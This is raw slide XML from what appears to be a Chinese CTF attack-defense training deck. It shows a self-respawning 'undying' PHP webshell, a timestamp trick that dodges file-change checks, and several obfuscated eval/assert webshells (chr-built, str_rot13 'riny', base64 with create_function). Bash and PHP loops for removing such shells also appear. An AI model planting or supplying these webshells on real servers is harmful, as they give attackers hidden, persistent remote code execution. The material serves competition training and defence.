              <a:rPr sz="1600" spc="-4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即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没有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时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间方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面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的限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制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16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  <a:tab pos="241300" algn="l"/>
                <a:tab pos="1008380" algn="l"/>
                <a:tab pos="1538605" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>unlink(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" u="heavy" spc="-45" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-204" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" u="heavy" spc="-204" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-55" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" spc="-55" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204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  <a:tab pos="241300" algn="l"/>
                <a:tab pos="1008380" algn="l"/>
                <a:tab pos="1538605" algn="l"/>
              </a:tabLst>
            </a:pP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删除文件本身，以起到隐蔽自身的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作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用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-30" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204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  <a:tab pos="241300" algn="l"/>
                <a:tab pos="1008380" algn="l"/>
                <a:tab pos="1538605" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr sz="16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4069" y="5896762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•</a:t>
            </a:r>
            <a:endParaRPr sz="16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9075" y="5581015"/>
            <a:ext cx="9906000" cy="77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循环内每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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usleep(5000)</a:t>
            </a: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微秒一微秒等于一百万分之一秒即写新的后门文件</a:t>
            </a:r>
            <a:endParaRPr sz="16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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern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执行的命令用于修改文件的创建或修改时间，可以绕过“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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find –name '*.php' –</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B060402020209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2415" y="6355715"/>
            <a:ext cx="84270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 panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>mmin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-9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25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-10”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命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令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检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测最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近</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-85" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>10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分钟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修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改或新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创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建的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-215" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>PHP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文件，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但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不一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定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有用，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>选。</a:t>
            </a:r>
            <a:endParaRPr sz="16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594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59232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不 死 马 脚</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="32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本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5" y="1597660"/>
            <a:ext cx="8764270" cy="252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干掉不死马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5080">
              <a:lnSpc>
                <a:spcPts val="1910"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204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通过不断向木马文件复写来克制，前提是写入速度要大于不死 马的生成速度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3947160">
              <a:lnSpc>
                <a:spcPts val="1940"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="936625" algn="l"/>
                <a:tab pos="1671955" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>&lt;?php  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g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re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r_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t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>(true); 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set_time_limit(0);  unlink(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 panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>FILE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 panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>);  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while(1)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1825"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>{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520065" marR="2112645">
              <a:lnSpc>
                <a:spcPts val="1940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>file_put_contents('./shell.php','11111'); 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usleep(0);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1810"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>}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?&gt;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 2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06" y="0"/>
            <a:ext cx="12118993" cy="67491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802" y="142494"/>
            <a:ext cx="11745595" cy="6390640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11745595" h="6390640">
                <a:moveTo>
                  <a:pt x="0" y="6390132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6390132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6390132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4069" y="652652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不 死 马 脚</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="32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本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815" y="1416685"/>
            <a:ext cx="5751195" cy="344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可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-140" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-12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55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不断的删除文件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1506855">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200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#!/bin/bash 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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>=./s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he</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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.p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Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>p 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while </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>true  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do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 marR="1818005" indent="126365">
              <a:lnSpc>
                <a:spcPts val="1940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>rm -rf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-1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$i  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done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不断的删除程序和杀进程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ts val="2050"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755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&lt;?php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1945"/>
              </a:lnSpc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while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(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="4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{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266700" marR="435610">
              <a:lnSpc>
                <a:spcPts val="1940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14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$pid=xxx; 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@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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>k(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sh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.p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hp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>'); 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exec('kill -9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$pid');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1815"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>}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?&gt;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 3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65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069" y="702182"/>
            <a:ext cx="252666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强 悍 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-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W </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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b </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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h </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-6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000" b="1" spc="4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b="1" spc="-6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l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863" y="1206245"/>
            <a:ext cx="5394325" cy="20688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&lt;?php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30"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="460"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>$a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-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30"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]);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sz="1500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr  ($a[51])]);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15" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>?&gt;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59690">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="460"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：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assert(${_POST}[4]);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65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post</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>传参</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：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4=phpinfo();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863" y="4168520"/>
            <a:ext cx="3854450" cy="12757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441960">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="-65" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>($b4dboy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-130" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>$_POST['b4dboy']) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="15" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>&amp;&amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-40" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>@preg_replace('/ad/e','@'.str_rot13('riny').’</a:t>
            </a:r>
            <a:endParaRPr sz="15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0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>($b4dboy)',</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-114" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-30" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>'add');</a:t>
            </a:r>
            <a:endParaRPr sz="15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spc="-25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>str_rot13(‘riny’)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>即编码后的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>完全避开了关键</a:t>
            </a:r>
            <a:endParaRPr sz="15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" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>字又不失效果</a:t>
            </a:r>
            <a:endParaRPr sz="15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0855" y="1112901"/>
            <a:ext cx="42767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&lt;?php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$mt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"mFsKCleRfU";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$ojj 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"IEBleldle";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$hsa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"E9TVFsnd2VuJ10p";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$fnx =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"Ow==";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$zk = str_replace(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"d",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"",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"sdtdrd_redpdldadcde" );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//str_replace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$ef =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$zk( "z", "",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"zbazsze64_zdzeczodze"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);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//base64_decode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$dva =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$zk( "p", "",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"pcprpepaptpe_fpupnpcptpipopn"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);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//create_function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$zvm = $dva( '', $ef(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$zk( "le", "",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$ojj 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$mt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$hsa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. $fnx ) ) ); //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@eval($_POST['wen']);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$zvm();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25" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>?&gt;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654" y="641222"/>
            <a:ext cx="274637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B </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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h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常 用 逻 辑 语</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-25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法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264" y="1309014"/>
            <a:ext cx="2200910" cy="530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5845" indent="27305">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>循环 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for i in list  do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command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done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 indent="27305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900" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>循环</a:t>
            </a:r>
            <a:endParaRPr sz="19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1209675">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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9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true  do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32715">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310"/>
              </a:spcBef>
            </a:pP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commond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done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82905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="31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900" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>判断</a:t>
            </a:r>
            <a:endParaRPr sz="19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latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>条件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-55" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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900" spc="-5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then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53365">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325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900" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>符合条件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”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53365">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310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900" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>不符合条件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”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fi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2609" y="1304137"/>
            <a:ext cx="2081530" cy="345884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494F4F"/>
              </a:buClr>
              <a:buSzPct val="80000"/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定义变量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a=“1”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A=`ls`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494F4F"/>
              </a:buClr>
              <a:buSzPct val="80000"/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获取变量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变量名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 marR="205105">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="494F4F"/>
              </a:buClr>
              <a:buSzPct val="80000"/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定义数组 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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myarray=(1 </a:t>
            </a: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2 3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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4)  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4858"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>获取数组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2000" spc="-50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C4858"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>${myarray[0]}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92125" y="580390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 5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6449" y="653287"/>
            <a:ext cx="274637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B </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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h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常 用 逻 辑 语</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-25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法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067" y="1368552"/>
            <a:ext cx="6929628" cy="4991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6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516127"/>
            <a:ext cx="6748780" cy="421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必 备 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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h </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-6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l l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命</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-13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令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  <a:p>
            <a:pPr marL="12700" marR="5337810" indent="27305">
              <a:lnSpc>
                <a:spcPct val="132000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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循环脚本  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>While </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>true;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-60" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" marR="4748530">
              <a:lnSpc>
                <a:spcPct val="132000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-140" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-175" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-75" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="20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14" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Done</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="382905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="77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当前网络连接数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45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-60" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-n </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-365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90" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>awk </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="60" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>'/^tcp/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-130" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>{++S[$NF]} </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-240" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>END </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>{for(a </a:t>
            </a:r>
            <a:r>
